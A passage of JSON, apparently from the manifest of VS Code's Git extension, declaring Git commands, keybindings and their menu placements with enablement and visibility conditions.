Commit","category":"Git","enablement":"!operationInProgress"},{"command":"git.checkout","title":"Checkout to...","category":"Git","enablement":"!operationInProgress"},{"command":"git.graph.checkout","title":"Checkout","category":"Git","enablement":"!operationInProgress"},{"command":"git.checkoutDetached","title":"Checkout to (Detached)...","category":"Git","enablement":"!operationInProgress"},{"command":"git.graph.checkoutDetached","title":"Checkout (Detached)","category":"Git","enablement":"!operationInProgress"},{"command":"git.branch","title":"Create Branch...","category":"Git","enablement":"!operationInProgress"},{"command":"git.branchFrom","title":"Create Branch From...","category":"Git","enablement":"!operationInProgress"},{"command":"git.deleteBranch","title":"Delete Branch...","category":"Git","enablement":"!operationInProgress"},{"command":"git.graph.deleteBranch","title":"Delete Branch","category":"Git","enablement":"!operationInProgress"},{"command":"git.deleteRemoteBranch","title":"Delete Remote Branch...","category":"Git","enablement":"!operationInProgress"},{"command":"git.renameBranch","title":"Rename Branch...","category":"Git","enablement":"!operationInProgress"},{"command":"git.merge","title":"Merge...","category":"Git","enablement":"!operationInProgress"},{"command":"git.mergeAbort","title":"Abort Merge","category":"Git","enablement":"gitMergeInProgress"},{"command":"git.rebase","title":"Rebase Branch...","category":"Git","enablement":"!operationInProgress"},{"command":"git.createTag","title":"Create Tag...","icon":"$(plus)","category":"Git","enablement":"!operationInProgress"},{"command":"git.deleteTag","title":"Delete Tag...","category":"Git","enablement":"!operationInProgress"},{"command":"git.migrateWorktreeChanges","title":"Migrate Worktree Changes...","category":"Git","enablement":"!operationInProgress"},{"command":"git.createWorktree","title":"Create Worktree...","category":"Git","enablement":"!operationInProgress"},{"command":"git.deleteWorktree","title":"Delete Worktree...","category":"Git","enablement":"!operationInProgress"},{"command":"git.deleteWorktree2","title":"Delete Worktree","category":"Git","enablement":"!operationInProgress"},{"command":"git.graph.deleteTag","title":"Delete Tag","category":"Git","enablement":"!operationInProgress"},{"command":"git.deleteRemoteTag","title":"Delete Remote Tag...","category":"Git","enablement":"!operationInProgress"},{"command":"git.fetch","title":"Fetch","category":"Git","enablement":"!operationInProgress"},{"command":"git.fetchPrune","title":"Fetch (Prune)","category":"Git","enablement":"!operationInProgress"},{"command":"git.fetchAll","title":"Fetch From All Remotes","icon":"$(git-fetch)","category":"Git","enablement":"!operationInProgress"},{"command":"git.fetchRef","title":"Fetch","icon":"$(git-fetch)","category":"Git","enablement":"!operationInProgress"},{"command":"git.pull","title":"Pull","category":"Git","enablement":"!operationInProgress"},{"command":"git.pullRebase","title":"Pull (Rebase)","category":"Git","enablement":"!operationInProgress"},{"command":"git.pullFrom","title":"Pull from...","category":"Git","enablement":"!operationInProgress"},{"command":"git.pullRef","title":"Pull","icon":"$(repo-pull)","category":"Git","enablement":"!operationInProgress && scmCurrentHistoryItemRefInFilter && scmCurrentHistoryItemRefHasRemote"},{"command":"git.push","title":"Push","category":"Git","enablement":"!operationInProgress"},{"command":"git.pushForce","title":"Push (Force)","category":"Git","enablement":"!operationInProgress"},{"command":"git.pushTo","title":"Push to...","category":"Git","enablement":"!operationInProgress"},{"command":"git.pushToForce","title":"Push to... (Force)","category":"Git","enablement":"!operationInProgress"},{"command":"git.pushTags","title":"Push Tags","category":"Git","enablement":"!operationInProgress"},{"command":"git.pushWithTags","title":"Push (Follow Tags)","category":"Git","enablement":"!operationInProgress"},{"command":"git.pushWithTagsForce","title":"Push (Follow Tags, Force)","category":"Git","enablement":"!operationInProgress"},{"command":"git.pushRef","title":"Push","icon":"$(repo-push)","category":"Git","enablement":"!operationInProgress && scmCurrentHistoryItemRefInFilter && scmCurrentHistoryItemRefHasRemote"},{"command":"git.cherryPick","title":"Cherry Pick...","category":"Git","enablement":"!operationInProgress"},{"command":"git.graph.cherryPick","title":"Cherry Pick","category":"Git","enablement":"!operationInProgress"},{"command":"git.cherryPickAbort","title":"Abort Cherry Pick","category":"Git","enablement":"!operationInProgress"},{"command":"git.addRemote","title":"Add Remote...","category":"Git","enablement":"!operationInProgress"},{"command":"git.removeRemote","title":"Remove Remote","category":"Git","enablement":"!operationInProgress"},{"command":"git.sync","title":"Sync","category":"Git","enablement":"!operationInProgress"},{"command":"git.syncRebase","title":"Sync (Rebase)","category":"Git","enablement":"!operationInProgress"},{"command":"git.publish","title":"Publish Branch...","category":"Git","icon":"$(cloud-upload)","enablement":"!operationInProgress"},{"command":"git.showOutput","title":"Show Git Output","category":"Git"},{"command":"git.ignore","title":"Add to .gitignore","category":"Git","enablement":"!operationInProgress"},{"command":"git.revealInExplorer","title":"Reveal in Explorer View","category":"Git"},{"command":"git.revealFileInOS.linux","title":"Open Containing Folder","category":"Git"},{"command":"git.revealFileInOS.mac","title":"Reveal in Finder","category":"Git"},{"command":"git.revealFileInOS.windows","title":"Reveal in File Explorer","category":"Git"},{"command":"git.stashIncludeUntracked","title":"Stash (Include Untracked)","category":"Git","enablement":"!operationInProgress"},{"command":"git.stash","title":"Stash","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashStaged","title":"Stash Staged","category":"Git","enablement":"!operationInProgress && gitVersion2.35"},{"command":"git.stashPop","title":"Pop Stash...","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashPopLatest","title":"Pop Latest Stash","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashPopEditor","title":"Pop Stash","icon":"$(git-stash-pop)","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashApply","title":"Apply Stash...","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashApplyLatest","title":"Apply Latest Stash","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashApplyEditor","title":"Apply Stash","icon":"$(git-stash-apply)","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashDrop","title":"Drop Stash...","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashDropAll","title":"Drop All Stashes...","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashDropEditor","title":"Drop Stash","icon":"$(trash)","category":"Git","enablement":"!operationInProgress"},{"command":"git.stashView","title":"View Stash...","category":"Git","enablement":"!operationInProgress"},{"command":"git.timeline.openDiff","title":"Open Changes","icon":"$(compare-changes)","category":"Git"},{"command":"git.timeline.copyCommitId","title":"Copy Commit ID","category":"Git"},{"command":"git.timeline.copyCommitMessage","title":"Copy Commit Message","category":"Git"},{"command":"git.timeline.selectForCompare","title":"Select for Compare","category":"Git"},{"command":"git.timeline.compareWithSelected","title":"Compare with Selected","category":"Git"},{"command":"git.timeline.viewCommit","title":"Open Commit","icon":"$(diff-multiple)","category":"Git"},{"command":"git.rebaseAbort","title":"Abort Rebase","category":"Git","enablement":"gitRebaseInProgress"},{"command":"git.closeAllDiffEditors","title":"Close All Diff Editors","category":"Git","enablement":"!operationInProgress"},{"command":"git.closeAllUnmodifiedEditors","title":"Close All Unmodified Editors","category":"Git","enablement":"!operationInProgress"},{"command":"git.api.getRepositories","title":"Get Repositories","category":"Git API"},{"command":"git.api.getRepositoryState","title":"Get Repository State","category":"Git API"},{"command":"git.api.getRemoteSources","title":"Get Remote Sources","category":"Git API"},{"command":"git.acceptMerge","title":"Complete Merge","category":"Git","enablement":"isMergeEditor && mergeEditorResultUri in git.mergeChanges"},{"command":"git.openMergeEditor","title":"Resolve in Merge Editor","category":"Git"},{"command":"git.runGitMerge","title":"Compute Conflicts With Git","category":"Git","enablement":"isMergeEditor"},{"command":"git.runGitMergeDiff3","title":"Compute Conflicts With Git (Diff3)","category":"Git","enablement":"isMergeEditor"},{"command":"git.manageUnsafeRepositories","title":"Manage Unsafe Repositories","category":"Git"},{"command":"git.openRepositoriesInParentFolders","title":"Open Repositories In Parent Folders","category":"Git"},{"command":"git.viewChanges","title":"Open Changes","icon":"$(diff-multiple)","category":"Git","enablement":"!operationInProgress"},{"command":"git.viewStagedChanges","title":"Open Staged Changes","icon":"$(diff-multiple)","category":"Git","enablement":"!operationInProgress"},{"command":"git.viewUntrackedChanges","title":"Open Untracked Changes","icon":"$(diff-multiple)","category":"Git","enablement":"!operationInProgress"},{"command":"git.viewCommit","title":"Open Commit","icon":"$(diff-multiple)","category":"Git","enablement":"!operationInProgress"},{"command":"git.copyCommitId","title":"Copy Commit ID","category":"Git"},{"command":"git.copyCommitMessage","title":"Copy Commit Message","category":"Git"},{"command":"git.blame.toggleEditorDecoration","title":"Toggle Git Blame Editor Decoration","category":"Git"},{"command":"git.blame.toggleStatusBarItem","title":"Toggle Git Blame Status Bar Item","category":"Git"},{"command":"git.graph.compareRef","title":"Compare with...","category":"Git","enablement":"!operationInProgress"},{"command":"git.graph.compareWithRemote","title":"Compare with Remote","category":"Git","enablement":"!operationInProgress && scmCurrentHistoryItemRefHasRemote"},{"command":"git.graph.compareWithMergeBase","title":"Compare with Merge Base","category":"Git","enablement":"!operationInProgress && scmCurrentHistoryItemRefHasBase"},{"command":"git.repositories.checkout","title":"Checkout","icon":"$(target)","category":"Git","enablement":"!operationInProgress && !scmArtifactIsHistoryItemRef"},{"command":"git.repositories.checkoutDetached","title":"Checkout (Detached)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.compareRef","title":"Compare with...","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.createBranch","title":"Create Branch...","icon":"$(plus)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.createTag","title":"Create Tag...","icon":"$(plus)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.merge","title":"Merge","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.rebase","title":"Rebase","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.deleteBranch","title":"Delete","category":"Git","enablement":"!operationInProgress && !scmArtifactIsHistoryItemRef"},{"command":"git.repositories.deleteTag","title":"Delete","category":"Git","enablement":"!operationInProgress && !scmArtifactIsHistoryItemRef"},{"command":"git.repositories.createFrom","title":"Create from...","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.stashView","title":"View Stash","icon":"$(diff-multiple)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.stashApply","title":"Apply Stash","icon":"$(git-stash-apply)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.stashPop","title":"Pop Stash","icon":"$(git-stash-pop)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.stashDrop","title":"Drop Stash","icon":"$(trash)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.createWorktree","title":"Create Worktree...","icon":"$(plus)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.openWorktree","title":"Open","icon":"$(folder-opened)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.openWorktreeInNewWindow","title":"Open in New Window","icon":"$(folder-opened)","category":"Git","enablement":"!operationInProgress"},{"command":"git.repositories.deleteWorktree","title":"Delete","category":"Git","enablement":"!operationInProgress"}],"continueEditSession":[{"command":"git.continueInLocalClone","qualifiedName":"Continue Working in New Local Clone","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && remoteName","remoteGroup":"remote_42_git_0_local@0"}],"keybindings":[{"command":"git.stageSelectedRanges","key":"ctrl+k ctrl+alt+s","mac":"cmd+k cmd+alt+s","when":"editorTextFocus && resourceScheme == file"},{"command":"git.unstageSelectedRanges","key":"ctrl+k ctrl+n","mac":"cmd+k cmd+n","when":"editorTextFocus && isInDiffEditor && isInDiffRightEditor && resourceScheme == git"},{"command":"git.revertSelectedRanges","key":"ctrl+k ctrl+r","mac":"cmd+k cmd+r","when":"editorTextFocus && resourceScheme == file"}],"menus":{"commandPalette":[{"command":"git.continueInLocalClone","when":"false"},{"command":"git.clone","when":"config.git.enabled && !git.missing"},{"command":"git.cloneRecursive","when":"config.git.enabled && !git.missing"},{"command":"git.init","when":"config.git.enabled && !git.missing && remoteName != 'codespaces'"},{"command":"git.openRepository","when":"config.git.enabled && !git.missing"},{"command":"git.close","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.closeOtherRepositories","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount > 1"},{"command":"git.openWorktree","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount > 1"},{"command":"git.openWorktreeInNewWindow","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount > 1"},{"command":"git.refresh","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.openFile","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && resourceScheme == file && scmActiveResourceHasChanges"},{"command":"git.openHEADFile","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && resourceScheme == file && scmActiveResourceHasChanges"},{"command":"git.openChange","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stage","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stageAll","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stageAllTracked","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stageAllUntracked","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stageAllMerge","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stageSelectedRanges","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && resourceScheme == file"},{"command":"git.stageChange","when":"false"},{"command":"git.revertSelectedRanges","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && resourceScheme == file"},{"command":"git.revertChange","when":"false"},{"command":"git.openFile2","when":"false"},{"command":"git.unstage","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.unstageAll","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.unstageSelectedRanges","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && resourceScheme == git"},{"command":"git.unstageChange","when":"false"},{"command":"git.clean","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.cleanAll","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.cleanAllTracked","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.cleanAllUntracked","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.rename","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && resourceScheme == file && scmActiveResourceRepository"},{"command":"git.commit","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitAmend","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitSigned","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitStaged","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitEmpty","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitStagedSigned","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitStagedAmend","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitAll","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitAllSigned","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.commitAllAmend","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.rebaseAbort","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && gitRebaseInProgress"},{"command":"git.commitNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitStagedNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitEmptyNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitStagedSignedNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitAmendNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitSignedNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitStagedAmendNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitAllNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitAllSignedNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.commitAllAmendNoVerify","when":"config.git.enabled && !git.missing && config.git.allowNoVerifyCommit && gitOpenRepositoryCount != 0"},{"command":"git.restoreCommitTemplate","when":"false"},{"command":"git.commitMessageAccept","when":"false"},{"command":"git.commitMessageDiscard","when":"false"},{"command":"git.revealInExplorer","when":"false"},{"command":"git.revealFileInOS.linux","when":"false"},{"command":"git.revealFileInOS.mac","when":"false"},{"command":"git.revealFileInOS.windows","when":"false"},{"command":"git.undoCommit","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.checkout","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.branch","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.branchFrom","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.deleteBranch","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.deleteRemoteBranch","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.renameBranch","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.cherryPick","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.cherryPickAbort","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && gitCherryPickInProgress"},{"command":"git.pull","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.pullFrom","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.pullRebase","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.merge","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.mergeAbort","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && gitMergeInProgress"},{"command":"git.rebase","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.createTag","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.deleteTag","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.migrateWorktreeChanges","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.createWorktree","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.openWorktree","when":"false"},{"command":"git.openWorktreeInNewWindow","when":"false"},{"command":"git.deleteWorktree","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.deleteWorktree2","when":"false"},{"command":"git.deleteRemoteTag","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.fetch","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.fetchPrune","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.fetchAll","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.push","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.pushForce","when":"config.git.enabled && !git.missing && config.git.allowForcePush && gitOpenRepositoryCount != 0"},{"command":"git.pushTo","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.pushToForce","when":"config.git.enabled && !git.missing && config.git.allowForcePush && gitOpenRepositoryCount != 0"},{"command":"git.pushWithTags","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.pushWithTagsForce","when":"config.git.enabled && !git.missing && config.git.allowForcePush && gitOpenRepositoryCount != 0"},{"command":"git.pushTags","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.addRemote","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.removeRemote","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.sync","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.syncRebase","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.publish","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.showOutput","when":"config.git.enabled"},{"command":"git.ignore","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && resourceScheme == file && scmActiveResourceRepository"},{"command":"git.stashIncludeUntracked","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stash","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stashStaged","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && gitVersion2.35"},{"command":"git.stashPop","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stashPopLatest","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stashPopEditor","when":"false"},{"command":"git.stashApply","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stashApplyLatest","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stashApplyEditor","when":"false"},{"command":"git.stashDrop","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stashDropAll","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.stashDropEditor","when":"false"},{"command":"git.timeline.openDiff","when":"false"},{"command":"git.timeline.copyCommitId","when":"false"},{"command":"git.timeline.copyCommitMessage","when":"false"},{"command":"git.timeline.selectForCompare","when":"false"},{"command":"git.timeline.compareWithSelected","when":"false"},{"command":"git.timeline.viewCommit","when":"false"},{"command":"git.closeAllDiffEditors","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0"},{"command":"git.api.getRepositories","when":"false"},{"command":"git.api.getRepositoryState","when":"false"},{"command":"git.api.getRemoteSources","when":"false"},{"command":"git.openMergeEditor","when":"false"},{"command":"git.manageUnsafeRepositories","when":"config.git.enabled && !git.missing && git.unsafeRepositoryCount != 0"},{"command":"git.openRepositoriesInParentFolders","when":"config.git.enabled && !git.missing && git.parentRepositoryCount != 0"},{"command":"git.stashView","when":"config.git.enabled && !git.missing"},{"command":"git.viewChanges","when":"config.git.enabled && !git.missing"},{"command":"git.viewStagedChanges","when":"config.git.enabled && !git.missing"},{"command":"git.viewUntrackedChanges","when":"config.git.enabled && !git.missing && config.git.untrackedChanges == separate"},{"command":"git.viewCommit","when":"false"},{"command":"git.stageFile","when":"false"},{"command":"git.unstageFile","when":"false"},{"command":"git.fetchRef","when":"false"},{"command":"git.pullRef","when":"false"},{"command":"git.pushRef","when":"false"},{"command":"git.copyCommitId","when":"false"},{"command":"git.copyCommitMessage","when":"false"},{"command":"git.graph.checkout","when":"false"},{"command":"git.graph.checkoutDetached","when":"false"},{"command":"git.graph.deleteBranch","when":"false"},{"command":"git.graph.compareRef","when":"false"},{"command":"git.graph.deleteTag","when":"false"},{"command":"git.graph.cherryPick","when":"false"},{"command":"git.graph.compareWithMergeBase","when":"false"},{"command":"git.graph.compareWithRemote","when":"false"},{"command":"git.diff.stageHunk","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && diffEditorOriginalUri =~ /^git\\:.*%22ref%22%3A%22~%22%7D$/"},{"command":"git.diff.stageSelection","when":"config.git.enabled && !git.missing && gitOpenRepositoryCount != 0 && diffEditorOriginalUri =~ /^git\\:.*%22ref%22%3A%22~%22%7D$/"},{"command":"git.repositories.checkout","when":"false"},{"command":"git.repositories.checkoutDetached","when":"false"},{"command":"git.repositories.compareRef","when":"false"},{"command":"git.repositories.createBranch","when":"false"},{"command":"git.repositories.createTag","when":"false"},{"command":"git.repositories.merge","when":"false"},{"command":"git.repositories.rebase","when":"false"},{"command":"git.repositories.deleteBranch","when":"false"},{"command":"git.repositories.deleteTag","when":"false"},{"command":"git.repositories.createFrom","when":"false"},{"command":"git.repositories.stashView","when":"false"},{"command":"git.repositories.stashApply","when":"false"},{"command":"git.repositories.stashPop","when":"false"},{"command":"git.repositories.stashDrop","when":"false"},{"command":"git.repositories.createWorktree","when":"false"},{"command":"git.repositories.openWorktree","when":"false"},{"command":"git.repositories.openWorktreeInNewWindow","when":"false"},{"command":"git.repositories.deleteWorktree","when":"false"}],"scm/title":[{"command":"git.commit","group":"navigation","when":"scmProvider == git"},{"command":"git.refresh","group":"navigation","when":"scmProvider == git"},{"command":"git.pull","group":"1_header@1","when":"scmProvider == git"},{"command":"git.push","group":"1_header@2","when":"scmProvider == git"},{"command":"git.clone","group":"1_header@3","when":"scmProvider == git"},{"command":"git.checkout","group":"1_header@4","when":"scmProvider == git"},{"command":"git.fetch","group":"1_header@5","when":"scmProvider == git"},{"submenu":"git.commit","group":"2_main@1","when":"scmProvider == git"},{"submenu":"git.changes","group":"2_main@2","when":"scmProvider == git"},{"submenu":"git.pullpush","group":"2_main@3","when":"scmProvider == git"},{"submenu":"git.branch","group":"2_main@4","when":"scmProvider == git"},{"submenu":"git.remotes","group":"2_main@5","when":"scmProvider == git"},{"submenu":"git.stash","group":"2_main@6","when":"scmProvider == git"},{"submenu":"git.tags","group":"2_main@7","when":"scmProvider == git"},{"submenu":"git.worktrees","group":"2_main@8","when":"scmProvider == git"},{"command":"git.showOutput","group":"3_footer","when":"scmProvider == git"}],"scm/repositories/title":[{"command":"git.reopenClosedRepositories","group":"navigation@1","when":"git.closedRepositoryCount > 0"}],"scm/repository":[{"command":"git.pull","group":"1_header@1","when":"scmProvider == git"},{"command":"git.push","group":"1_header@2","when":"scmProvider == git"},{"command":"git.clone","group":"1_header@3","when":"scmProvider == git"},{"command":"git.checkout","group":"1_header@4","when":"scmProvider == git"},{"command":"git.fetch","group":"1_header@5","when":"scmProvider == git"},{"submenu":"git.commit","group":"2_main@1","when":"scmProvider == git"},{"submenu":"git.changes","group":"2_main@2","when":"scmProvider == git"},{"submenu":"git.pullpush","group":"2_main@3","when":"scmProvider == git"},{"submenu":"git.branch","group":"2_main@4","when":"scmProvider == git"},{"submenu":"git.remotes","group":"2_main@5","when":"scmProvider == git"},{"submenu":"git.stash","group":"2_main@6","when":"scmProvider == git"},{"submenu":"git.tags","group":"2_main@7","when":"scmProvider == git"},{"submenu":"git.worktrees","group":"2_main@8","when":"scmProvider == git"},{"command":"git.showOutput","group":"3_footer","when":"scmProvider == git"}],"scm/sourceControl":[{"command":"git.close","group":"navigation@1","when":"scmProvider == git"},{"command":"git.closeOtherRepositories","group":"navigation@2","when":"scmProvider == git && gitOpenRepositoryCount > 1"},{"command":"git.openWorktree","group":"1_worktree@1","when":"scmProvider == git && scmProviderContext == worktree"},{"command":"git.openWorktreeInNewWindow","group":"1_worktree@2","when":"scmProvider == git && scmProviderContext == worktree"},{"command":"git.deleteWorktree2","group":"2_worktree@1","when":"scmProvider == git && scmProviderContext == worktree"}],"scm/artifactGroup/context":[{"command":"git.repositories.createBranch","group":"inline@1","when":"scmProvider == git && scmArtifactGroup == branches"},{"command":"git.repositories.createTag","group":"inline@1","when":"scmProvider == git && scmArtifactGroup == tags"},{"submenu":"git.repositories.stash","group":"inline@1","when":"scmProvider == git && scmArtifactGroup == stashes"},{"command":"git.repositories.createWorktree","group":"inline@1","when":"scmProvider == git && scmArtifactGroup == worktrees"}],"scm/artifact/context":[{"command":"git.repositories.checkout","group":"inline@1","when":"scmProvider == git && (scmArtifactGroupId == branches || scmArtifactGroupId == tags)"},{"command":"git.repositories.stashApply","alt":"git.repositories.stashPop","group":"inline@1","when":"scmProvider == git && scmArtifactGroupId == stashes"},{"command":"git.repositories.stashView","group":"1_view@1","when":"scmProvider == git && scmArtifactGroupId == stashes"},{"command":"git.repositories.stashApply","group":"2_apply@1","when":"scmProvider == git && scmArtifactGroupId == stashes"},{"command":"git.repositories.stashPop","group":"2_apply@2","when":"scmProvider == git && scmArtifactGroupId == stashes"},{"command":"git.repositories.stashDrop","group":"3_drop@3","when":"scmProvider == git && scmArtifactGroupId == stashes"},{"command":"git.repositories.checkout","group":"1_checkout@1","when":"scmProvider == git && (scmArtifactGroupId == branches || scmArtifactGroupId == tags)"},{"command":"git.repositories.checkoutDetached","group":"1_checkout@2","when":"scmProvider == git && (scmArtifactGroupId == branches || scmArtifactGroupId == tags)"},{"command":"git.repositories.merge","group":"2_modify@1","when":"scmProvider == git && scmArtifactGroupId == branches"},{"command":"git.repositories.rebase","group":"2_modify@2","when":"scmProvider == git && scmArtifactGroupId == branches"},{"command":"git.repositories.createFrom","group":"3_modify@1","when":"scmProvider == git && scmArtifactGroupId == branches"},{"command":"git.repositories.deleteBranch","group":"3_modify@2","when":"scmProvider == git && scmArtifactGroupId == branches"},{"command":"git.repositories.deleteTag","group":"3_modify@1","when":"scmProvider == git && scmArtifactGroupId == tags"},{"command":"git.repositories.compareRef","group":"4_compare@1","when":"scmProvider == git && (scmArtifactGroupId == branches || scmArtifactGroupId == tags)"},{"command":"git.repositories.openWorktreeInNewWindow","group":"inline@1","when":"scmProvider == git && scmArtifactGroupId == worktrees"},{"command":"git.repositories.openWorktree","group":"1_open@1","when":"scmProvider == git && scmArtifactGroupId == worktrees"},{"command":"git.repositories.openWorktreeInNewWindow","group":"1_open@2","when":"scmProvider == git && scmArtifactGroupId == worktrees"},{"command":"git.repositories.deleteWorktree","group":"2_modify@1","when":"scmProvider == git && 